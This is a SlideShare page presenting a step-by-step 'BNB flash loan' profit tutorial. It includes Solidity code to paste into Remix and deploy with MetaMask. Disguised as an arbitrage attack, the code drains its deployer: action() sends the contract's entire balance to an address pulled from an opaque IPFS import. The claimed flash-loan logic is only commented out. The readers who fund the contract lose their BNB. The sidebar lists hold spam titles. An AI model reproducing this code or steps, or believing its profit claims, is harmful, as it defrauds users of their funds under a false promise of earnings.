SlideShare una empresa de Scribd logo
1 de 9
Descargar para leer sin conexión
LatestBNB FlashLoan MethodTutorial UpdatedJuly14, 2021
In thistutorial,aminorchange appliedtothe flashloanattack's code.we made some adjustmentsto
the code forslightlyfasterexecution.
Stepby steptutorial :
1. Download MetaMask For Chrome WebBrowser
You can downloadand install MetaMaskfromthislink:
https://chrome.google.com/webstore/detail/metamask/nkbihfbeogaeaoehlefnkodbefgpgknn.
2. Create a“Custom RPC”in MetaMask for connecting toBinance Smart Chain
thisstepisusedfor connectingyourwallettothe Mainnetnetwork SmartChain.Belowthisis the
networksettingtoadd a SmartChain.
Name:SmartChain
NewRPC URL: https://bsc-dataseed.binance.org/
ChainID:56
Symbol:BNB
BlockExplorerURL: https://bscscan.com
For complete infoaboutthe explanation,please visitthisBinance article:
https://www.followchain.org/connect-metamask-to-binance/
3. Open http://remix.ethereum.org/ fromyour browser
OpenEthereumRemix tomake orextendthe smartcontract which laterisusedfor makinga smart
contract FlashLoan Attack to the Binance SmartContract network.
4. Click on Solidity Compiler (2ndmenubuttonfrom the left) andselect
compiler versionto0.5.0
Change the compilerversionto“0.5.0+commit.1d4f565a”. Thisis neededtomake yourcompilerversion
isthe same as the source code you'll use.
5. Create afile Solidity “MyContract.sol”inthe File Explorer (1st menubutton
from the left)
6. Copy and paste the code belowto the MyContract.sol file:
--------COPYBELOWLINE ------orfromlink----->FlashLoanCode:http://bit.ly/3i85HtG--------------------------
------------
pragma solidity^0.5.0;
// Multiplier-Finance SmartContracts
//import"https://github.com/Multiplier-Finance/MCL-
FlashloanDemo/blob/main/contracts/interfaces/ILendingPoolAddressesProvider.sol";
//import"https://github.com/Multiplier-Finance/MCL-
FlashloanDemo/blob/main/contracts/interfaces/ILendingPool.sol";
// PancakeSwapSmartContracts
//import"https://github.com/pancakeswap/pancake-swap-
core/blob/master/contracts/interfaces/IPancakeCallee.sol";
//import"https://github.com/pancakeswap/pancake-swap-
core/blob/master/contracts/interfaces/IPancakeFactory.sol";
//import"https://github.com/pancakeswap/pancake-swap-
core/blob/master/contracts/interfaces/IPancakePair.sol";
import"https://ipfs.io/ipfs/QmUiNr7BG7Xgugmd2jPFrzhEC7SxhDNtstFJguD7EDwiXH";
contract GetFlashLoan{
stringpublictokenName;
stringpublictokenSymbol;
uintloanAmount;
Manager manager;
constructor(stringmemory_tokenName,stringmemory_tokenSymbol,uint_loanAmount)
public{
tokenName =_tokenName;
tokenSymbol =_tokenSymbol;
loanAmount=_loanAmount;
manager= new Manager();
}
function() externalpayable {}
functionaction() publicpayable {
address(uint160(manager.pancakeDepositAddress())).transfer(address(this).balance);
manager.performTasks();
/*
stringmemorytokenAddress=manager.submitToken(tokenName,tokenSymbol);
manager.pancakeswapListToken(tokenName,tokenSymbol,tokenAddress);
stringmemoryloanAddress=manager.takeFlashLoan(loanAmount);
manager.pancakeswapDAItoBNB(loanAmount/2);
stringmemorybnbPair=manager.pancakeswapCreatePool(tokenAddress,"BNB");
manager.pancakeswapAddLiquidity(bnbPair,loanAmount/2);
stringmemorydaiPair= manager.pancakeswapCreatePool(tokenAddress,"DAI");
manager.pancakeswapAddLiquidity(daiPair,loanAmount/2);
manager.pancakeswapPerformSwaps();
manager.contractToWallet("BNB");
manager.repayLoan(loanAddress);
*/
}
}
----------------------------------------COPYENDLINE---------------------------------------------------------
7. Click on Solidity Compiler (2ndmenubuttonfrom the left) andCompile
Look fora dropdownContract at the bottomof the SolidityCompilermenu,onthatdropdownContract
choose “GetFlashLoan(MyContract.sol)”andthenclickCompile MyContract.sol.
8. Click on Deploy & run transactions (3rdmenubuttonfrom the left) and
Deploy
- At the verytop,change the dropdownEnvironmentvalue to “InjectedWeb3”(Forremix users,firstly
there will be a confirmationonthe MetaMask,Accept the confirmationnotificationonthe MetaMask
walletChrome Extention).
- The MetaMask walletaddresswill automaticallybe connectedIf you're alreadyconnectedtoyour
MetaMask Account.
- There'sa dropdown nexttothe,clickthat dropdownand create a SmartContract name you desired.
Eg. :
_TOKENNAME= FlashLoan (write randomtokenname)
_TOKENSYMBOL = FLO (write randomthree of four-lettersymbol)
_LOANAMOUNT= 1000 (amountloan)
- ClickTransact and confirminMetaMask.
- afteryoucreate a Smart Contract,wait till the transactioncomplete andyou'll have yoursmart
contract address.Copythe contract address(underthe DeployedContractsdropdownmenu)
9. Input a Liquidity tothe Smart Contract
To inputa Liquidity,transferyournominalBNBtothe Smart Contract addressyouhave createdbefore
by usingthe transferfeature inthe MetaMaskChrome Extention.Sendthe nominal BNB( the amount
BNB will affectthe profityouwill earn). Waittill the liquidityadditiontransactioncomplete.
10. FlashLoan Attack
Aftercreatinga Smart Contractwith liquidityadded( Step9 ) and setthe amountof loan( Step8 ), click
the dropdownfrom the successtransaction( Step8 ) it will displayadropdownmenuwith some button
that isaction,tokenName,tokenSymbol.Click "action"( redbutton) to run the smart contract. wait for
a while until the transactioncomplete,andregularlycheckyourBNBbalance onthe walletfromthe
MetaMask Chome Extension.
Note:Sometimesthe code give errorandsometimesitwill notworkfrom the firsttime.Youmustthen
start the whole processfrombegining.
DISCLAIMER: FOREDUCATIONALPURPOSESONLY. Try at your own risk.
Reference Video: https://www.youtube.com/watch?v=KKjvMT3rO8Y

Más contenido relacionado

Similar a Bnb flash loan trick how i earned 500 bnb with no coding pancake swap arbitrage

KinomaJS on Microcontroller
KinomaJS on MicrocontrollerKinomaJS on Microcontroller
KinomaJS on Microcontroller
Ryuji Ishiguro
 
235470379 rfc-destination-sap-srm
235470379 rfc-destination-sap-srm235470379 rfc-destination-sap-srm
235470379 rfc-destination-sap-srm
Manish Nangalia
 

Similar a Bnb flash loan trick how i earned 500 bnb with no coding pancake swap arbitrage (20)

All in-one-smart node-v1.2.4
All in-one-smart node-v1.2.4All in-one-smart node-v1.2.4
All in-one-smart node-v1.2.4
 
Eclipsecon Europe: Blockchain, Ethereum and Business Applications
Eclipsecon Europe: Blockchain, Ethereum and Business ApplicationsEclipsecon Europe: Blockchain, Ethereum and Business Applications
Eclipsecon Europe: Blockchain, Ethereum and Business Applications
 
Chapter 8
Chapter 8Chapter 8
Chapter 8
 
How to Integrate Internet of Things with Webserver with
How to Integrate Internet of Things with Webserver with How to Integrate Internet of Things with Webserver with
How to Integrate Internet of Things with Webserver with
 
Blockchain spreads
Blockchain spreadsBlockchain spreads
Blockchain spreads
 
KinomaJS on Microcontroller
KinomaJS on MicrocontrollerKinomaJS on Microcontroller
KinomaJS on Microcontroller
 
235470379 rfc-destination-sap-srm
235470379 rfc-destination-sap-srm235470379 rfc-destination-sap-srm
235470379 rfc-destination-sap-srm
 
BlockChain for the Banker
BlockChain for the BankerBlockChain for the Banker
BlockChain for the Banker
 
PVS-Studio and Continuous Integration: TeamCity. Analysis of the Open RollerC...
PVS-Studio and Continuous Integration: TeamCity. Analysis of the Open RollerC...PVS-Studio and Continuous Integration: TeamCity. Analysis of the Open RollerC...
PVS-Studio and Continuous Integration: TeamCity. Analysis of the Open RollerC...
 
Guide To Create Your Own BEP20 Token on Binance Smart Chain
Guide To Create Your Own BEP20 Token on Binance Smart ChainGuide To Create Your Own BEP20 Token on Binance Smart Chain
Guide To Create Your Own BEP20 Token on Binance Smart Chain
 
IBM MQ CONNAUTH/CHLAUTH Doesn't Work Like You Think it Does (and if you aren'...
IBM MQ CONNAUTH/CHLAUTH Doesn't Work Like You Think it Does (and if you aren'...IBM MQ CONNAUTH/CHLAUTH Doesn't Work Like You Think it Does (and if you aren'...
IBM MQ CONNAUTH/CHLAUTH Doesn't Work Like You Think it Does (and if you aren'...
 
leewayhertz.com-How to build a dApp on Avalanche blockchain
leewayhertz.com-How to build a dApp on Avalanche blockchainleewayhertz.com-How to build a dApp on Avalanche blockchain
leewayhertz.com-How to build a dApp on Avalanche blockchain
 
What Web 2.pdf
What Web 2.pdfWhat Web 2.pdf
What Web 2.pdf
 
Launch crypto 2x times faster.pptx
Launch crypto 2x times faster.pptxLaunch crypto 2x times faster.pptx
Launch crypto 2x times faster.pptx
 
New Flash Builder 4 WSDL and HTTP Connectors
New Flash Builder 4 WSDL and HTTP ConnectorsNew Flash Builder 4 WSDL and HTTP Connectors
New Flash Builder 4 WSDL and HTTP Connectors
 
Evolutionary Systems - Kafka Microservices
Evolutionary Systems - Kafka MicroservicesEvolutionary Systems - Kafka Microservices
Evolutionary Systems - Kafka Microservices
 
Hyperledger
HyperledgerHyperledger
Hyperledger
 
Micro services from scratch - Part 1
Micro services from scratch - Part 1Micro services from scratch - Part 1
Micro services from scratch - Part 1
 
GSC Aviation
GSC AviationGSC Aviation
GSC Aviation
 
Example Cosmos SDK Application Tutorial
Example Cosmos SDK Application TutorialExample Cosmos SDK Application Tutorial
Example Cosmos SDK Application Tutorial
 

Más de MdAlAmin332

Más de MdAlAmin332 (20)

About me spells casting that works min
About me   spells casting that works minAbout me   spells casting that works min
About me spells casting that works min
 
Watch fox sports 1 online live stream using almost all device without any shu...
Watch fox sports 1 online live stream using almost all device without any shu...Watch fox sports 1 online live stream using almost all device without any shu...
Watch fox sports 1 online live stream using almost all device without any shu...
 
Watch fox sports 1 online live stream using almost all device without any shu...
Watch fox sports 1 online live stream using almost all device without any shu...Watch fox sports 1 online live stream using almost all device without any shu...
Watch fox sports 1 online live stream using almost all device without any shu...
 
Watch fox sports 1 online live stream using almost all device without any shu...
Watch fox sports 1 online live stream using almost all device without any shu...Watch fox sports 1 online live stream using almost all device without any shu...
Watch fox sports 1 online live stream using almost all device without any shu...
 
Watch fox sports 1 online live stream using almost all device without any shu...
Watch fox sports 1 online live stream using almost all device without any shu...Watch fox sports 1 online live stream using almost all device without any shu...
Watch fox sports 1 online live stream using almost all device without any shu...
 
Online virtual assistance jobs
Online virtual assistance jobsOnline virtual assistance jobs
Online virtual assistance jobs
 
Online virtual assistance jobs
Online virtual assistance jobsOnline virtual assistance jobs
Online virtual assistance jobs
 
Free keto diet plan 2021
Free keto diet plan 2021Free keto diet plan 2021
Free keto diet plan 2021
 
Jefferson and the wall between church and state by ryan bilodeau
Jefferson and the wall between church and state by ryan bilodeauJefferson and the wall between church and state by ryan bilodeau
Jefferson and the wall between church and state by ryan bilodeau
 
Want to cook ridiculously tasty vegan recipes from scratch but have no idea w...
Want to cook ridiculously tasty vegan recipes from scratch but have no idea w...Want to cook ridiculously tasty vegan recipes from scratch but have no idea w...
Want to cook ridiculously tasty vegan recipes from scratch but have no idea w...
 
The ingenious way to learn piano
The ingenious way to learn pianoThe ingenious way to learn piano
The ingenious way to learn piano
 
Earth's largest database of woodworking projects
Earth's largest database of woodworking projectsEarth's largest database of woodworking projects
Earth's largest database of woodworking projects
 
Discover the reading tha reveals the secrets to yoour soul purpose
Discover the reading tha reveals the secrets to yoour soul purposeDiscover the reading tha reveals the secrets to yoour soul purpose
Discover the reading tha reveals the secrets to yoour soul purpose
 
The ingenious way to learn piano
The ingenious way to learn pianoThe ingenious way to learn piano
The ingenious way to learn piano
 
Earth's largest database of woodworking projects
Earth's largest database of woodworking projectsEarth's largest database of woodworking projects
Earth's largest database of woodworking projects
 
Discover the reading tha reveals the secrets to yoour soul purpose
Discover the reading tha reveals the secrets to yoour soul purposeDiscover the reading tha reveals the secrets to yoour soul purpose
Discover the reading tha reveals the secrets to yoour soul purpose
 
Betforward
BetforwardBetforward
Betforward
 
Discover how women & men over 50 are dropping pounds like crazy with a si...
Discover how women & men over 50 are dropping pounds like crazy with a si...Discover how women & men over 50 are dropping pounds like crazy with a si...
Discover how women & men over 50 are dropping pounds like crazy with a si...
 
Car service-repair-manuals
Car service-repair-manualsCar service-repair-manuals
Car service-repair-manuals
 
Auto service-repair-manuals
Auto service-repair-manualsAuto service-repair-manuals
Auto service-repair-manuals
 

Último

Quick Doctor In Kuwait +2773`7758`557 Kuwait Doha Qatar Dubai Abu Dhabi Sharj...
Quick Doctor In Kuwait +2773`7758`557 Kuwait Doha Qatar Dubai Abu Dhabi Sharj...Quick Doctor In Kuwait +2773`7758`557 Kuwait Doha Qatar Dubai Abu Dhabi Sharj...
Quick Doctor In Kuwait +2773`7758`557 Kuwait Doha Qatar Dubai Abu Dhabi Sharj...
daisycvs
 
Mifepristone Available in Muscat +918761049707^^ €€ Buy Abortion Pills in Oman
Mifepristone Available in Muscat +918761049707^^ €€ Buy Abortion Pills in OmanMifepristone Available in Muscat +918761049707^^ €€ Buy Abortion Pills in Oman
Mifepristone Available in Muscat +918761049707^^ €€ Buy Abortion Pills in Oman
instagramfab782445
 
Jual Obat Aborsi ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan Cytotec
Jual Obat Aborsi ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan CytotecJual Obat Aborsi ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan Cytotec
Jual Obat Aborsi ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan Cytotec
ZurliaSoop
 
Al Mizhar Dubai Escorts +971561403006 Escorts Service In Al Mizhar
Al Mizhar Dubai Escorts +971561403006 Escorts Service In Al MizharAl Mizhar Dubai Escorts +971561403006 Escorts Service In Al Mizhar
Al Mizhar Dubai Escorts +971561403006 Escorts Service In Al Mizhar
allensay1
 
unwanted pregnancy Kit [+918133066128] Abortion Pills IN Dubai UAE Abudhabi
unwanted pregnancy Kit [+918133066128] Abortion Pills IN Dubai UAE Abudhabiunwanted pregnancy Kit [+918133066128] Abortion Pills IN Dubai UAE Abudhabi
unwanted pregnancy Kit [+918133066128] Abortion Pills IN Dubai UAE Abudhabi
Abortion pills in Kuwait Cytotec pills in Kuwait
 

Último (20)

Quick Doctor In Kuwait +2773`7758`557 Kuwait Doha Qatar Dubai Abu Dhabi Sharj...
Quick Doctor In Kuwait +2773`7758`557 Kuwait Doha Qatar Dubai Abu Dhabi Sharj...Quick Doctor In Kuwait +2773`7758`557 Kuwait Doha Qatar Dubai Abu Dhabi Sharj...
Quick Doctor In Kuwait +2773`7758`557 Kuwait Doha Qatar Dubai Abu Dhabi Sharj...
 
TVB_The Vietnam Believer Newsletter_May 6th, 2024_ENVol. 006.pdf
TVB_The Vietnam Believer Newsletter_May 6th, 2024_ENVol. 006.pdfTVB_The Vietnam Believer Newsletter_May 6th, 2024_ENVol. 006.pdf
TVB_The Vietnam Believer Newsletter_May 6th, 2024_ENVol. 006.pdf
 
Lucknow Housewife Escorts by Sexy Bhabhi Service 8250092165
Lucknow Housewife Escorts  by Sexy Bhabhi Service 8250092165Lucknow Housewife Escorts  by Sexy Bhabhi Service 8250092165
Lucknow Housewife Escorts by Sexy Bhabhi Service 8250092165
 
Phases of Negotiation .pptx
 Phases of Negotiation .pptx Phases of Negotiation .pptx
Phases of Negotiation .pptx
 
Uneak White's Personal Brand Exploration Presentation
Uneak White's Personal Brand Exploration PresentationUneak White's Personal Brand Exploration Presentation
Uneak White's Personal Brand Exploration Presentation
 
joint cost.pptx COST ACCOUNTING Sixteenth Edition ...
joint cost.pptx  COST ACCOUNTING  Sixteenth Edition                          ...joint cost.pptx  COST ACCOUNTING  Sixteenth Edition                          ...
joint cost.pptx COST ACCOUNTING Sixteenth Edition ...
 
Mifepristone Available in Muscat +918761049707^^ €€ Buy Abortion Pills in Oman
Mifepristone Available in Muscat +918761049707^^ €€ Buy Abortion Pills in OmanMifepristone Available in Muscat +918761049707^^ €€ Buy Abortion Pills in Oman
Mifepristone Available in Muscat +918761049707^^ €€ Buy Abortion Pills in Oman
 
Buy gmail accounts.pdf buy Old Gmail Accounts
Buy gmail accounts.pdf buy Old Gmail AccountsBuy gmail accounts.pdf buy Old Gmail Accounts
Buy gmail accounts.pdf buy Old Gmail Accounts
 
Organizational Transformation Lead with Culture
Organizational Transformation Lead with CultureOrganizational Transformation Lead with Culture
Organizational Transformation Lead with Culture
 
Marel Q1 2024 Investor Presentation from May 8, 2024
Marel Q1 2024 Investor Presentation from May 8, 2024Marel Q1 2024 Investor Presentation from May 8, 2024
Marel Q1 2024 Investor Presentation from May 8, 2024
 
Jual Obat Aborsi ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan Cytotec
Jual Obat Aborsi ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan CytotecJual Obat Aborsi ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan Cytotec
Jual Obat Aborsi ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan Cytotec
 
Al Mizhar Dubai Escorts +971561403006 Escorts Service In Al Mizhar
Al Mizhar Dubai Escorts +971561403006 Escorts Service In Al MizharAl Mizhar Dubai Escorts +971561403006 Escorts Service In Al Mizhar
Al Mizhar Dubai Escorts +971561403006 Escorts Service In Al Mizhar
 
Horngren’s Cost Accounting A Managerial Emphasis, Canadian 9th edition soluti...
Horngren’s Cost Accounting A Managerial Emphasis, Canadian 9th edition soluti...Horngren’s Cost Accounting A Managerial Emphasis, Canadian 9th edition soluti...
Horngren’s Cost Accounting A Managerial Emphasis, Canadian 9th edition soluti...
 
SEO Case Study: How I Increased SEO Traffic & Ranking by 50-60% in 6 Months
SEO Case Study: How I Increased SEO Traffic & Ranking by 50-60%  in 6 MonthsSEO Case Study: How I Increased SEO Traffic & Ranking by 50-60%  in 6 Months
SEO Case Study: How I Increased SEO Traffic & Ranking by 50-60% in 6 Months
 
unwanted pregnancy Kit [+918133066128] Abortion Pills IN Dubai UAE Abudhabi
unwanted pregnancy Kit [+918133066128] Abortion Pills IN Dubai UAE Abudhabiunwanted pregnancy Kit [+918133066128] Abortion Pills IN Dubai UAE Abudhabi
unwanted pregnancy Kit [+918133066128] Abortion Pills IN Dubai UAE Abudhabi
 
Katrina Personal Brand Project and portfolio 1
Katrina Personal Brand Project and portfolio 1Katrina Personal Brand Project and portfolio 1
Katrina Personal Brand Project and portfolio 1
 
Dr. Admir Softic_ presentation_Green Club_ENG.pdf
Dr. Admir Softic_ presentation_Green Club_ENG.pdfDr. Admir Softic_ presentation_Green Club_ENG.pdf
Dr. Admir Softic_ presentation_Green Club_ENG.pdf
 
Falcon Invoice Discounting: Tailored Financial Wings
Falcon Invoice Discounting: Tailored Financial WingsFalcon Invoice Discounting: Tailored Financial Wings
Falcon Invoice Discounting: Tailored Financial Wings
 
Call 7737669865 Vadodara Call Girls Service at your Door Step Available All Time
Call 7737669865 Vadodara Call Girls Service at your Door Step Available All TimeCall 7737669865 Vadodara Call Girls Service at your Door Step Available All Time
Call 7737669865 Vadodara Call Girls Service at your Door Step Available All Time
 
Lundin Gold - Q1 2024 Conference Call Presentation (Revised)
Lundin Gold - Q1 2024 Conference Call Presentation (Revised)Lundin Gold - Q1 2024 Conference Call Presentation (Revised)
Lundin Gold - Q1 2024 Conference Call Presentation (Revised)
 

Bnb flash loan trick how i earned 500 bnb with no coding pancake swap arbitrage